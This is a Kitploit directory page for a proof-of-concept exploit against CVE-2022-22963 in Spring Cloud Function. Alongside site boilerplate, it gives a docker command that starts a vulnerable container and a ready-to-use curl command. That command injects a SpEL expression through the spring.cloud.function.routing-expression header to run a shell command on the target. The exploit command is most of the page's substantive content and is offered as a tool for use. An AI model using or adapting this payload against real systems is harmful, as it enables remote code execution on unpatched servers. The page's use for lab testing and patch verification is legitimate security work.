Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-22963 — Proof-of-concept exploit for CVE-2022-22963 (Spring4Shell) with a vulnerable Docker container and curl-based remote code execution via Spring Cloud Function routing expressions. | Kitploit
Tools/GitHubGitHub/darryk10/cve-2022-22963
Payload GenerationVulnerability AnalysisExploitationWeb Application Exploitation
GitHubdarryk10/cve-2022-22963

CVE-2022-22963

Proof-of-concept exploit for CVE-2022-22963 (Spring4Shell) with a vulnerable Docker container and curl-based remote code execution via Spring Cloud Function routing expressions.

View Repository
341624 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-22963 - Spring4shell

To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example:

root@kitploit:~
docker run -it -d -p 8080:8080 bobcheat/springboot-public

Exploit

Curl command:

root@kitploit:~
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'

Or using Burp suite:

Burpsuite

Credits

https://github.com/hktalent/spring-spel-0day-poc

Download Tool